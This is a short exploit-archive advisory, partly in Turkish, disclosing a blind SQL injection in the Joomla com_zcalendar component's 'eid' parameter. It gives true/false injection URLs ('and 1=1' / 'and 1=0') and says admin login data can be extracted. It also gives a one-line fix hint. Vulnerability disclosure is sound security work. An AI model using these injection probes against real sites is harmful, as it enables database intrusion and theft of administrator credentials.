id: 10323
date: 12/18/2009
title: Joomla Component com_zcalendar Blind SQL-injection Vulnerability
author: Fl0riX
cves: 

================================================================
Joomla Component com_zcalendar Blind SQL-injection Vulnerability
================================================================

<------------------- header data start ------------------- >
 
#############################################################
#       Joomla Component com_zcalendar Blind SQL-injection Vulnerability                       #
#############################################################
 
# author        : Fl0riX
 
# Name        : com_zcalendar
 
# Bug Type       : Blind SQL Injection
 
# Infection      : Admin login bilgileri al&#65533;nabilir.
 
# Demo Vuln.     :
TRUE(+)
&#65533; http://server/index.php?option=com_zcalendar&task=view&vmode=e&eid=236 and 1=1
FALSE(-)
&#65533; http://server/index.php?option=com_zcalendar&task=view&vmode=e&eid=236 and 1=0
 
# Bug Fix Advice : Zararl&#65533; karakterler filtrelenmelidir.
 
#############################################################
 
< ------------------- header data end of ------------------- >
 
< -- bug code start -- >
 
path/index.php?option=com_zcalendar&task=view&vmode=e&eid=[Blind]
 
< -- bug code end of -- >



#  0day.today [2023-03-25]  #